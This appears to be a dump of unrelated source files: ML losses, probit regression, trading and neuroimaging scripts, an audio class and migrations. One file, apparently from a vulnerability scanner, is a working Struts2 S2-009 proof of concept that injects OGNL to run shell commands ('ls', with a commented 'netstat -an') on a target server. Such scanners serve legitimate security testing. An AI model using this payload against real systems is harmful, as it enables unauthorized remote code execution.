# 'exec', 'filter', 'float', 'format', 'frozenset', 'get_ipython', 'getattr',
# 'globals', 'hasattr', 'hash', 'help', 'hex', 'id', 'input', 'int',
# 'isinstance', 'issubclass', 'iter', 'len', 'license', 'list', 'locals', 'map',
# 'max', 'memoryview', 'min', 'next', 'object', 'oct', 'open', 'ord', 'pow',
# 'print', 'property', 'range', 'repr', 'reversed', 'round', 'set', 'setattr',
# 'slice', 'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type',
# 'vars', 'zip']
pprint.pprint([s for s in dir(__builtins__) if s.endswith('Error')], compact=True)
# ['ArithmeticError', 'AssertionError', 'AttributeError', 'BlockingIOError',
# 'BrokenPipeError', 'BufferError', 'ChildProcessError',
# 'ConnectionAbortedError', 'ConnectionError', 'ConnectionRefusedError',
# 'ConnectionResetError', 'EOFError', 'EnvironmentError', 'FileExistsError',
# 'FileNotFoundError', 'FloatingPointError', 'IOError', 'ImportError',
# 'IndentationError', 'IndexError', 'InterruptedError', 'IsADirectoryError',
# 'KeyError', 'LookupError', 'MemoryError', 'ModuleNotFoundError', 'NameError',
# 'NotADirectoryError', 'NotImplementedError', 'OSError', 'OverflowError',
# 'PermissionError', 'ProcessLookupError', 'RecursionError', 'ReferenceError',
# 'RuntimeError', 'SyntaxError', 'SystemError', 'TabError', 'TimeoutError',
# 'TypeError', 'UnboundLocalError', 'UnicodeDecodeError', 'UnicodeEncodeError',
# 'UnicodeError', 'UnicodeTranslateError', 'ValueError', 'ZeroDivisionError']
pprint.pprint([s for s in dir(__builtins__) if s.endswith('Warning')], compact=True)
# ['BytesWarning', 'DeprecationWarning', 'FutureWarning', 'ImportWarning',
# 'PendingDeprecationWarning', 'ResourceWarning', 'RuntimeWarning',
# 'SyntaxWarning', 'UnicodeWarning', 'UserWarning', 'Warning']
print('len' in dir(__builtins__))
# True
|
misc/config_tools/board_inspector/extractors/helpers.py | donsheng/acrn-hypervisor | 848 | 12658033 | <filename>misc/config_tools/board_inspector/extractors/helpers.py
# Copyright (C) 2021 Intel Corporation. All rights reserved.
#
# SPDX-License-Identifier: BSD-3-Clause
#
import lxml
def add_child(element, tag, text=None, **kwargs):
child = lxml.etree.Element(tag)
child.text = text
for k,v in kwargs.items():
child.set(k, v)
element.append(child)
return child
def get_node(etree, xpath):
result = etree.xpath(xpath)
assert len(result) <= 1, "Internal error: cannot get texts from multiple nodes at a time"
return result[0] if len(result) == 1 else None
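# Example (hypothetical element tree, for illustration only):
#
#   root = lxml.etree.Element("processors")
#   add_child(root, "processor", family="6", model="85")
#   get_node(root, "//processor[@model='85']")  # -> that element, or None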
|
vulnscan/POC/struts2/struts2_009_poc.py | imfiver/Sec-Tools | 144 | 12658040 | import requests
# any URL can be used here
def poc(url):
print('test {} --> struts2_009'.format(url))
url += "/ajax/example5.action"
    # run the ls command
exp = "?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%[email protected]@getRuntime().exec(%27ls%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%[email protected]@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)] HTTP/1.1"
#exp = '''?class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27netstat -an%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]'''
url += exp
try:
resp = requests.get(url, timeout=10)
print(resp)
if resp.status_code == 200:
print('test --> struts2_009 Success!')
return True
except:
print('test --> struts2_009 Failed!')
return False
return False
if __name__ == "__main__":
print(poc('http://127.0.0.1:8080')) |
peeringdb_server/client_adaptor/setup.py | CyberFlameGO/peeringdb | 224 | 12658052 | <filename>peeringdb_server/client_adaptor/setup.py
"""
django-peeringdb backend setup (needed for pdb_load_data command)
"""
from django_peeringdb.client_adaptor.setup import configure # noqa
|
rlgraph/components/loss_functions/euclidian_distance_loss.py | RLGraph/RLGraph | 290 | 12658061 | <gh_stars>100-1000
# Copyright 2018/2019 ducandu GmbH, All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import numpy as np
from rlgraph import get_backend
from rlgraph.components.loss_functions.supervised_loss_function import SupervisedLossFunction
from rlgraph.spaces.bool_box import BoolBox
from rlgraph.utils.decorators import rlgraph_api
if get_backend() == "tf":
import tensorflow as tf
class EuclidianDistanceLoss(SupervisedLossFunction):
"""
Calculates the loss between two vectors (prediction and label) via their Euclidian distance:
d(v,w) = SQRT(SUMi( (vi - wi)² ))
"""
def __init__(self, time_steps=None, scope="euclidian-distance", **kwargs):
"""
Args:
            time_steps (Optional[int]): If given, reduce-sum linearly over this many timesteps with weights decaying
                from 1.0 (first time-step) towards 0.0 (last time-step).
"""
super(EuclidianDistanceLoss, self).__init__(scope=scope, **kwargs)
self.time_steps = time_steps
self.reduce_ranks = None
self.time_rank = None
self.time_major = None
self.is_bool = None
def check_input_spaces(self, input_spaces, action_space=None):
in_space = input_spaces["labels"]
self.is_bool = isinstance(in_space, BoolBox) # Need to cast (to 0.0 and 1.0) in graph_fn?
self.reduce_ranks = np.array(list(range(in_space.rank)))
if in_space.has_batch_rank:
self.reduce_ranks += 1
if in_space.has_time_rank:
self.reduce_ranks += 1
self.time_rank = in_space.has_time_rank
self.time_major = in_space.time_major
@rlgraph_api
def _graph_fn_loss_per_item(self, parameters, labels, sequence_length=None, time_percentage=None):
"""
Euclidian distance loss.
Args:
parameters (SingleDataOp): Output predictions.
labels (SingleDataOp): Labels.
sequence_length (SingleDataOp): The lengths of each sequence (if applicable) in the given batch.
Returns:
SingleDataOp: The loss values vector (one single value for each batch item).
"""
batch_rank = 0 if self.time_major is False else 1
time_rank = 0 if batch_rank == 1 else 1
if get_backend() == "tf":
# Reduce over last rank (vector axis) and take the square root.
if self.is_bool:
labels = tf.cast(labels, tf.float32)
parameters = tf.cast(parameters, tf.float32)
euclidian_distance = tf.square(tf.subtract(parameters, labels))
euclidian_distance = tf.reduce_sum(euclidian_distance, axis=self.reduce_ranks)
euclidian_distance = tf.sqrt(euclidian_distance)
# TODO: Make it possible to customize the time-step decay (or increase?) behavior.
# Weight over time-steps (linearly decay weighting over time rank, cutting out entirely values past the
# sequence length).
if sequence_length is not None:
max_time_steps = tf.cast(tf.shape(labels)[time_rank], dtype=tf.float32)
sequence_mask = tf.sequence_mask(sequence_length, max_time_steps, dtype=tf.float32)
sequence_decay = tf.expand_dims(
tf.range(start=1.0, limit=0.0, delta=-1.0 / max_time_steps, dtype=tf.float32), axis=batch_rank
)
weighting = sequence_mask * sequence_decay
euclidian_distance = tf.multiply(euclidian_distance, weighting)
# Reduce away the time-rank.
euclidian_distance = tf.reduce_sum(euclidian_distance, axis=time_rank)
euclidian_distance = tf.divide(euclidian_distance, tf.cast(sequence_length, dtype=tf.float32))
else:
# Reduce away the time-rank.
if hasattr(parameters, "_time_rank"):
euclidian_distance = tf.reduce_mean(euclidian_distance, axis=time_rank)
return euclidian_distance
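# Worked example of the distance itself (plain arithmetic, independent of the
# TF graph code above): for a prediction v = [1, 2, 2] and label w = [0, 0, 0],
# d(v, w) = sqrt(1^2 + 2^2 + 2^2) = sqrt(9) = 3.0, which is the per-item value
# this loss produces before any sequence-length weighting.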
|
recipes/Python/577371_sending_gmail_though_python_code/recipe-577371.py | tdiprima/code | 2,023 | 12658077 | #Sending an email through gmail using Python - <NAME>
import smtplib
fromaddr = '<EMAIL>'
toaddrs = '<EMAIL>'
msg = 'Email message from PYTHON Raghuram app'
#provide gmail user name and password
username = 'gmailUserName'
password = '<PASSWORD>'
# functions to send an email
server = smtplib.SMTP('smtp.gmail.com:587')
server.ehlo()
server.starttls()
server.ehlo()
server.login(username,password)
server.sendmail(fromaddr, toaddrs, msg)
server.quit()
|
maro/utils/exception/__init__.py | yangboz/maro | 598 | 12658091 | from .base_exception import MAROException
from .error_code import ERROR_CODE
__all__ = ["ERROR_CODE", "MAROException"]
|
scripts/probitRegDemo.py | vipavlovic/pyprobml | 4,895 | 12658107 | <filename>scripts/probitRegDemo.py<gh_stars>1000+
import superimport
import numpy as np
from scipy.stats import norm
from scipy.optimize import minimize
from matplotlib import pyplot as plt
from cycler import cycler
import jax.numpy as jnp
import jax.scipy.stats.norm as jnorm
from jax import grad
import pyprobml_utils as pml
from statsmodels.discrete.discrete_model import Probit
cb_color = ['#377eb8', '#ff7f00']
cb_cycler = (cycler(linestyle=['-', '--', '-.']) * cycler(color=cb_color))
plt.rc('axes', prop_cycle=cb_cycler)
np.random.seed(0)
class ProbitReg:
def __init__(self):
self.loglikehist = []
self.max_iter = 100
self.tolerance = 1e-4
self.w = []
    # Probit NLL = -sum(y * log(Phi(X.w))) - sum((1-y) * log(Phi(-X.w)))
def probitloss(self, X, y, w): # NLL
return -jnp.sum(y * jnorm.logcdf(jnp.dot(X, w))) - \
jnp.sum((1 - y) * jnorm.logcdf(-jnp.dot(X, w)))
def objfn(self, X, y, w, lam): # penalized likelihood.
return jnp.sum(lam * jnp.square(w[1:])) - self.probitloss(X, y, w)
def probreg_fit_em(self, X, y, lam):
self.w = np.linalg.lstsq(
X + np.random.rand(X.shape[0], X.shape[1]), y, rcond=None)[0].reshape(-1, 1)
def estep(w):
u = X @ w
z = u + norm.pdf(u) / ((y == 1) - norm.cdf(-u))
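            # E-step: posterior mean of the truncated latent normal. For y=1
            # the denominator is 1 - Phi(-u) = Phi(u), giving z = u + pdf(u)/Phi(u);
            # for y=0 it is -Phi(-u), giving z = u - pdf(u)/(1 - Phi(u)).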
loglik = self.objfn(X, y, w, lam)
return z, loglik
# M step function is the ridge regression
def mstep(X, y, lam):
return ridge_reg(X, y, lam)
i = 1
stop = False
while not stop:
z, loglike = estep(self.w)
self.loglikehist.append(loglike)
self.w = mstep(X, z, lam)
if i >= self.max_iter:
stop = True
elif i > 1:
# if slope becomes less than tolerance.
stop = np.abs((self.loglikehist[i - 1] - self.loglikehist[i - 2]) / (
self.loglikehist[i - 1] + self.loglikehist[i - 2])) <= self.tolerance / 2
i += 1
self.loglikehist = self.loglikehist[0:i - 1]
return self.w, np.array(self.loglikehist)
def probit_reg_fit_gradient(self, X, y, lam):
winit = jnp.linalg.lstsq(
X + np.random.rand(X.shape[0], X.shape[1]), y, rcond=None)[0].reshape(-1, 1)
self.loglikehist = []
self.loglikehist.append((-self.objfn(X, y, winit, lam)))
def obj(w):
w = w.reshape(-1, 1)
# PNLL
return self.probitloss(X, y, w) + jnp.sum(lam * jnp.square(w[1:]))
def grad_obj(w):
return grad(obj)(w)
def callback(w):
loglik = obj(w) # LL
self.loglikehist.append(loglik)
res = minimize(
obj,
x0=winit,
jac=grad_obj,
callback=callback,
method='BFGS')
return res['x'], np.array(self.loglikehist[0:-1])
def predict(self, X, w):
p = jnorm.cdf(jnp.dot(X, w))
y = np.array((p > 0.5), dtype='int32')
return y, p
# using matrix inversion for ridge regression
def ridge_reg(X, y, lambd): # returns weight vectors.
D = X.shape[1]
w = np.linalg.inv(X.T @ X + lambd * np.eye(D, D)) @ X.T @ y
return w
def flip_bits(y, p):
    # flip each label with probability p
    flip = np.random.rand(y.shape[0], 1) < p
    y[flip] = 1 - y[flip]
    return y
n, d = 100, 2
data_x = np.random.randn(n, d)
w = np.random.randn(d, 1)
data_y = flip_bits((data_x @ w > 0), 0)
lam = 1e-2
# statsmodel.Probit
sm_probit_reg = Probit(exog=data_x, endog=data_y).fit(disp=0, method='bfgs')
sm_probit_prob = sm_probit_reg.predict(exog=data_x)
# Our Implementation:
probit_reg = ProbitReg()
# EM:
em_w, obj_trace_em = probit_reg.probreg_fit_em(data_x, data_y, lam)
em_ypred, em_prob = probit_reg.predict(data_x, em_w)
# gradient:
gradient_w, obj_trace_gradient = probit_reg.probit_reg_fit_gradient(
data_x, data_y, lam)
gradient_ypred, gradient_prob = probit_reg.predict(data_x, gradient_w)
plt.figure()
plt.plot(sm_probit_prob, em_prob, 'o')
plt.xlabel('statsmodel.probit')
plt.ylabel('em')
plt.figure()
plt.plot(gradient_prob, em_prob, 'o')
plt.xlabel('bfgs')
plt.ylabel('em')
plt.title('probit regression with L2 regularizer of {0:.3f}'.format(lam))
plt.show()
plt.figure()
plt.plot(-obj_trace_em.flatten(), '-o', linewidth=2)
plt.plot(obj_trace_gradient.flatten(), ':s', linewidth=1)
plt.legend(['em', 'bfgs'])
plt.title('probit regression with L2 regularizer of {0:.3f}'.format(lam))
plt.ylabel('logpost')
plt.xlabel('iter')
pml.save_fig('../figures/probitRegDemoNLL.pdf')
plt.show()
|
koku/masu/test/processor/azure/test_azure_report_charge_updater.py | rubik-ai/koku | 157 | 12658142 | <reponame>rubik-ai/koku
#
# Copyright 2021 Red Hat Inc.
# SPDX-License-Identifier: Apache-2.0
#
"""Test the AzureCostModelCostUpdater object."""
from masu.database.azure_report_db_accessor import AzureReportDBAccessor
from masu.external.date_accessor import DateAccessor
from masu.processor.azure.azure_cost_model_cost_updater import AzureCostModelCostUpdater
from masu.test import MasuTestCase
class AzureCostModelCostUpdaterTest(MasuTestCase):
"""Test Cases for the AzureCostModelCostUpdater object."""
def test_azure_update_summary_cost_model_costs(self):
"""Test to verify Azure derived cost summary is calculated."""
updater = AzureCostModelCostUpdater(schema=self.schema, provider=self.azure_provider)
start_date = DateAccessor().today_with_timezone("UTC")
bill_date = start_date.replace(day=1).date()
updater.update_summary_cost_model_costs()
with AzureReportDBAccessor(self.schema) as accessor:
bill = accessor.get_cost_entry_bills_by_date(bill_date)[0]
self.assertIsNotNone(bill.derived_cost_datetime)
|
Python/hello_waldo.py | saurabhcommand/Hello-world | 1,428 | 12658143 | <gh_stars>1000+
print('Hello Waldo!')
|
etc/converter/convert-to-FfDL.py | adrian555/FfDL | 680 | 12658163 | <filename>etc/converter/convert-to-FfDL.py
#
# Copyright 2017-2018 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
from ruamel.yaml import YAML
import sys
import getopt
#global variables
language = ''
inputfile = ''
outputfile = ''
samplefile = ''
yaml=YAML(typ='safe')
def getFfDL():
try:
f = open(inputfile, "r")
response = f.read()
data = yaml.load(response)
f.close()
return data
except:
print("Missing {}".format(inputfile))
def getSampleJob():
try:
if samplefile:
f = open(samplefile,"r")
else:
f = open("sample-FfDL.yaml","r")
response = f.read()
resYaml = yaml.load(response)
f.close()
return resYaml
except:
print("Missing sample-FfDL.yaml")
def createJob(sample,data):
try:
sample['framework']['name'] = data['model_definition']['framework']['name']
sample['name'] = data['model_definition']['name']
sample['description'] = data['model_definition']['description']
sample['framework']['command'] = data['model_definition']['execution']['command']
sample['data_stores'][0]['id'] = data['training_data_reference']['name']
sample['data_stores'][0]['connection']['auth_url'] = data['training_data_reference']['connection']['endpoint_url']
sample['data_stores'][0]['connection']['user_name'] = data['training_data_reference']['connection']['access_key_id']
sample['data_stores'][0]['connection']['password'] = data['training_data_reference']['connection']['secret_access_key']
sample['data_stores'][0]['training_data']['container'] = data['training_data_reference']['source']['bucket']
sample['data_stores'][0]['training_results']['container'] = data['training_results_reference']['target']['bucket']
py2 = False
CPU = False
try:
if data['model_definition']['framework']['name'] == 'tensorflow':
if '2.' in data['model_definition']['framework']['runtimes']['version']:
py2 = True
except:
py2 = False
try:
sample['learners'] = int(data['model_definition']['execution']['compute_configuration']['nodes'])
except:
sample['learners'] = 1
# Detect T-shirt requirements
if data['model_definition']['execution']['compute_configuration']['name'] == "k80":
sample['cpus'] = 4
sample['gpus'] = 1
sample['memory'] = '24Gb'
elif data['model_definition']['execution']['compute_configuration']['name'] == "p100":
sample['cpus'] = 8
sample['gpus'] = 1
sample['memory'] = '24Gb'
elif data['model_definition']['execution']['compute_configuration']['name'] == "v100":
sample['cpus'] = 26
sample['gpus'] = 1
sample['memory'] = '24Gb'
elif data['model_definition']['execution']['compute_configuration']['name'] == "k80x2":
sample['cpus'] = 8
sample['gpus'] = 2
sample['memory'] = '48Gb'
elif data['model_definition']['execution']['compute_configuration']['name'] == "p100x2":
sample['cpus'] = 16
sample['gpus'] = 2
sample['memory'] = '48Gb'
elif data['model_definition']['execution']['compute_configuration']['name'] == "v100x2":
sample['cpus'] = 52
sample['gpus'] = 2
sample['memory'] = '48Gb'
elif data['model_definition']['execution']['compute_configuration']['name'] == "k80x4":
sample['cpus'] = 16
sample['gpus'] = 4
sample['memory'] = '96Gb'
else:
CPU = True
sample['cpus'] = 1
sample['gpus'] = 0
sample['memory'] = '1Gb'
# Detect Framework version
try:
if data['model_definition']['framework']['name'] == 'tensorflow':
if '1.3' in data['model_definition']['framework']['version']:
if py2:
if CPU:
sample['framework']['version'] = "1.3.0"
else:
sample['framework']['version'] = "1.3.0-gpu"
else:
if CPU:
sample['framework']['version'] = "1.3.0-py3"
else:
sample['framework']['version'] = "1.3.0-gpu-py3"
elif '1.4' in data['model_definition']['framework']['version']:
if py2:
if CPU:
sample['framework']['version'] = "1.4.0"
else:
sample['framework']['version'] = "1.4.0-gpu"
else:
if CPU:
sample['framework']['version'] = "1.4.0-py3"
else:
sample['framework']['version'] = "1.4.0-gpu-py3"
elif '1.5' in data['model_definition']['framework']['version']:
if py2:
if CPU:
sample['framework']['version'] = "1.5.0"
else:
sample['framework']['version'] = "1.5.0-gpu"
else:
if CPU:
sample['framework']['version'] = "1.5.0-py3"
else:
sample['framework']['version'] = "1.5.0-gpu-py3"
elif '1.6' in data['model_definition']['framework']['version']:
if py2:
if CPU:
sample['framework']['version'] = "1.6.0"
else:
sample['framework']['version'] = "1.6.0-gpu"
else:
if CPU:
sample['framework']['version'] = "1.6.0-py3"
else:
sample['framework']['version'] = "1.6.0-gpu-py3"
elif '1.7' in data['model_definition']['framework']['version']:
if py2:
if CPU:
sample['framework']['version'] = "1.7.0"
else:
sample['framework']['version'] = "1.7.0-gpu"
else:
if CPU:
sample['framework']['version'] = "1.7.0-py3"
else:
sample['framework']['version'] = "1.7.0-gpu-py3"
else:
if py2:
if CPU:
sample['framework']['version'] = "latest"
else:
sample['framework']['version'] = "latest-gpu"
else:
if CPU:
sample['framework']['version'] = "latest-py3"
else:
sample['framework']['version'] = "latest-gpu-py3"
elif data['model_definition']['framework']['name'] == 'caffe':
if CPU:
sample['framework']['version'] = "cpu"
else:
sample['framework']['version'] = "gpu"
elif data['model_definition']['framework']['name'] == 'pytorch':
sample['framework']['version'] = "latest"
except:
print("Wrong framework.version contents in {}".format(inputfile))
if data['model_definition']['framework']['name'] != "tensorflow":
sample.pop('evaluation_metrics', None)
except:
print("Missing contents in {}".format(inputfile))
try:
if outputfile:
f = open(outputfile, "w")
else:
f = open("manifest-FfDL.yaml", "w")
yaml.default_flow_style = False
yaml.dump(sample, f)
f.close()
except:
if outputfile:
print("Cannot write contents to {}".format(outputfile))
else:
print("Cannot write contents to manifest-FfDL.yaml.")
if __name__ == "__main__":
argv = sys.argv[1:]
try:
opts, args = getopt.getopt(argv,"i:o:s:",["ifile=","ofile=","sfile="])
except getopt.GetoptError:
print('Format Error: Wrong format.')
print('convert-to-FfDL.py -i <inputfile> -o <outputfile> -s <samplefile>')
sys.exit(2)
for opt, arg in opts:
if opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-o", "--ofile"):
outputfile = arg
elif opt in ("-s", "--sfile"):
samplefile = arg
if not inputfile:
print('Input Error: inputfile cannot be empty.')
print('convert-to-FfDL.py -i <inputfile> -o <outputfile> -s <samplefile>')
sys.exit(2)
data = getFfDL()
sample = getSampleJob()
createJob(sample,data)
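# --- Illustrative invocation (not part of the original script) ---
# A minimal sketch of how this converter might be run; the file names below
# are placeholders rather than files shipped with the project:
#   python convert-to-FfDL.py -i model-definition.yml -o manifest-FfDL.yaml -s sample.yml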
|
OnePy/sys_module/components/market_maker.py | Chandlercjy/OnePyfx | 321 | 12658175 | import arrow
from OnePy.constants import EVENT
from OnePy.sys_module.components.exceptions import (BacktestFinished,
BlowUpError)
from OnePy.sys_module.metabase_env import OnePyEnvBase
from OnePy.sys_module.models.base_bar import BarBase
from OnePy.sys_module.models.calendar import Calendar
class MarketMaker(OnePyEnvBase):
calendar: Calendar = None
@classmethod
def update_market(cls):
try:
cls.env.cur_suspended_tickers.clear()
cls.calendar.update_calendar()
cls._update_bar()
cls._update_recorder()
cls._check_blowup()
cls.env.event_engine.put(EVENT.Market_updated)
except (BacktestFinished, BlowUpError):
            cls._update_recorder(final=True)  # at the end of the backtest, update the account with the closing data
raise BacktestFinished
@classmethod
def initialize(cls):
cls.env.logger.critical(f"正在初始化OnePy")
cls._initialize_calendar()
cls._initialize_feeds()
cls._initialize_cleaners()
cls.env.logger.critical(f"{'='*15} OnePy初始化成功! {'='*15}")
cls.env.logger.critical("开始寻找OnePiece之旅~~~")
@classmethod
def _initialize_calendar(cls):
cls.calendar = Calendar(cls.env.instrument)
@classmethod
def _initialize_feeds(cls):
for value in list(cls.env.readers.values()):
            if value.ticker:  # readers named only by a key are not initialized as tickers
ohlc_bar = cls.get_bar(value.ticker, cls.env.sys_frequency)
if ohlc_bar.initialize(buffer_day=7):
cls.env.tickers.append(value.ticker)
cls.env.feeds.update({value.ticker: ohlc_bar})
@classmethod
def _initialize_cleaners(cls):
for ticker in list(cls.env.tickers):
for cleaner in list(cls.env.cleaners.values()):
bufferday = cleaner.buffer_day
cleaner.initialize_buffer_data(ticker, bufferday)
@classmethod
def _update_recorder(cls, final=False):
for recorder in cls.env.recorders.values():
recorder.update(order_executed=final)
@classmethod
def _check_blowup(cls):
if cls.env.recorder.balance.latest() <= 0:
cls.env.logger.critical("The account is BLOW UP!")
raise BlowUpError
@classmethod
def _update_bar(cls):
for ticker in cls.env.tickers:
iter_bar = cls.env.feeds[ticker]
try:
iter_bar.next()
except StopIteration:
todate = arrow.get(cls.env.todate).format(
"YYYY-MM-DD HH:mm:ss")
if cls.env.sys_date == todate:
if cls.env.is_show_today_signals:
iter_bar.move_next_ohlc_to_cur_ohlc()
else:
raise BacktestFinished
else:
cls.env.cur_suspended_tickers.append(ticker)
cls.env.suspended_tickers_record[ticker].append(
cls.env.sys_date)
@classmethod
def get_bar(cls, ticker, frequency) -> BarBase:
return cls.env.recorder.bar_class(ticker, frequency)
|
wooey/migrations/0014_wooeyjob_uuid_finalise.py | fridmundklaus/wooey | 1,572 | 12658202 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import uuid
class Migration(migrations.Migration):
dependencies = [
('wooey', '0013_wooeyjob_uuid_populate'),
]
operations = [
# Set to unique=True
migrations.AlterField(
model_name='wooeyjob',
name='uuid',
field=models.CharField(default=uuid.uuid4, unique=True, max_length=255),
),
]
|
core/envs/lab.py | R3NI3/pytorch-rl | 851 | 12658283 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from copy import deepcopy
from gym.spaces.box import Box
import inspect
from utils.helpers import Experience # NOTE: here state0 is always "None"
from utils.helpers import preprocessAtari, rgb2gray, rgb2y, scale
from core.env import Env
class LabEnv(Env):
def __init__(self, args, env_ind=0):
super(LabEnv, self).__init__(args, env_ind)
assert self.env_type == "lab"
|
aim/sdk/objects/audio.py | avkudr/aim | 2,195 | 12658293 | import io
import logging
import os.path
from aim.sdk.num_utils import inst_has_typename
from aim.sdk.objects.io import wavfile
from aim.storage.object import CustomObject
from aim.storage.types import BLOB
logger = logging.getLogger(__name__)
@CustomObject.alias('aim.audio')
class Audio(CustomObject):
"""Audio object used to store audio objects in Aim repository..
Currently, audio formats are limited to mp3, wav, flac
Args:
data: file path, bytes, io.BaseIO or numpy.array (only for WAV)
format (:obj:`str`): Format of the audio source
rate (:obj:`int`): Rate of the audio file, for WAV defaults to 22500
caption (:obj:`str`, optional): Optional audio caption. '' by default.
"""
AIM_NAME = 'aim.audio'
# supported audio formats
UNKNOWN = ''
MP3 = 'mp3'
WAV = 'wav'
FLAC = 'flac'
audio_formats = (MP3, WAV, FLAC)
def __init__(self, data, format: str = '', caption: str = '', rate: int = None):
super().__init__()
audio_format = format.lower()
if inst_has_typename(data, ['ndarray.numpy']):
# Currently, only WAV audio formats are supported for numpy
audio_format = self.WAV
if not rate:
rate = 22500
logger.info(f'Parameter "rate" is not provided! Using default: {rate}')
bs = wavfile.write(rate, data)
data = bs
# act as a regular file with enforced audio format definition by user side
if not audio_format:
raise ValueError('Audio format must be provided.')
elif audio_format not in self.audio_formats:
raise ValueError(f'Invalid audio format is provided. Must be one of {self.audio_formats}')
if isinstance(data, str):
if not os.path.exists(data) or not os.path.isfile(data):
raise ValueError('Invalid audio file path')
with open(data, 'rb') as FS:
data = FS.read()
elif isinstance(data, io.BytesIO):
data = data.read()
if not isinstance(data, bytes):
raise TypeError('Content is not a byte-stream object')
extra = {
'caption': caption,
'format': audio_format
}
self._prepare(data, **extra)
def _prepare(self, data, **extra) -> None:
assert isinstance(data, bytes)
for k, v in extra.items():
self.storage[k] = v
self.storage['data'] = BLOB(data=data)
def to_numpy(self):
"""
This method converts WAV to Numpy array.
Other audio formats are not supported at this moment.
Returns: numpy array
"""
        assert self.storage['format'] == self.WAV
return wavfile.read(self.get())
def get(self) -> io.BytesIO:
"""
Reads data from the inner container and writes it to a buffer
Returns: io.BytesIO
"""
bs = self.storage.get('data')
if not bs:
return io.BytesIO()
return io.BytesIO(bytes(bs))
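# --- Illustrative usage (not part of the original module) ---
# A minimal sketch, assuming numpy is available: wrap a short mono signal as a
# WAV-backed Audio object and read it back. The signal values are arbitrary.
if __name__ == '__main__':
    import numpy as np

    signal = (0.1 * np.sin(np.linspace(0.0, 440.0, 22500))).astype(np.float32)
    demo = Audio(signal, rate=22500, caption='demo tone')
    print(demo.storage['format'], len(demo.get().read()))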
|
appendix/check_diff_upresnet10.py | ly17java8-yangsen/waifu2x-caffe | 7,366 | 12658318 |
import os
import os.path as osp
import sys
import google.protobuf as pb
from argparse import ArgumentParser
import numpy as np
import shutil
import caffe
from caffe.proto import caffe_pb2
sys.path.append('waifu2x-chainer')
from lib import srcnn
import chainer
def main():
caffe.set_mode_cpu()
model_name = 'UpResNet10'
model_dir = 'waifu2x-chainer/models/{}'.format(model_name.lower())
model_class = srcnn.archs[model_name]
for filename in os.listdir(model_dir):
basename, ext = os.path.splitext(filename)
if ext == '.npz':
model_path = os.path.join(model_dir, filename)
print(model_path)
channels = 3 if 'rgb' in filename else 1
model = model_class(channels)
chainer.serializers.load_npz(model_path, model)
model.to_cpu()
params = {}
for path, param in model.namedparams():
params[path] = param.array
net = caffe.Net('upresnet10_3.prototxt', caffe.TEST)
for key in net.params:
l = len(net.params[key])
net.params[key][0].data[...] = params[key + '/W']
if l >= 2:
net.params[key][1].data[...] = params[key + '/b']
input_data = np.empty(net.blobs['input'].data.shape, dtype=np.float32)
input_data[...] = np.random.random_sample(net.blobs['input'].data.shape)
net.blobs['input'].data[...] = input_data
ret = net.forward()
input_data = np.empty(net.blobs['input'].data.shape, dtype=np.float32)
input_data[...] = np.random.random_sample(net.blobs['input'].data.shape)
net.blobs['input'].data[...] = input_data
ret = net.forward()
batch_y = model(input_data)
print(batch_y.array - ret['/conv_post'])
if __name__ == '__main__':
caffe.init_log(3)
main()
|
resources/utility_scripts/process_subjects.py | inaccel/TractSeg | 148 | 12658342 |
"""
Random code for testing purposes
"""
from pathlib import Path
import subprocess as sp
from p_tqdm import p_map
import numpy as np
def run_tractseg(subject_id):
# dir = base / subject_id
dir = base / subject_id / "session_1"
# sp.call(f"TractSeg -i {dir}/peaks.nii.gz --preview", shell=True)
# sp.call(f"TractSeg -i {dir}/peaks.nii.gz --output_type endings_segmentation --preview", shell=True)
# sp.call(f"TractSeg -i {dir}/peaks.nii.gz --output_type TOM --preview", shell=True)
sp.call(f"Tracking -i {dir}/peaks.nii.gz --tracking_format tck --algorithm prob --test 3", shell=True)
# sp.call(f"Tractometry -i {dir}/tractseg_output/TOM_trackings " +
# f"-o {dir}/tractseg_output/Tractometry.csv " +
# f"-e {dir}/tractseg_output/endings_segmentations -s {dir}/FA.nii.gz --tracking_format tck",
# shell=True)
if __name__ == '__main__':
# base = Path("/mnt/nvme/data/dwi/tractometry_test_subjectSpace")
base = Path("/mnt/nvme/data/dwi/tractseg_example")
# base = Path("/mnt/nvme/data/dwi/rotation_test")
# subjects = ["s01", "s02", "s03", "s04"]
subjects = ["s01"]
# subjects = ["UZB"]
def process_subject(subject_id):
run_tractseg(subject_id)
p_map(process_subject, subjects, num_cpus=1, disable=False)
# Run Tractometry statistics
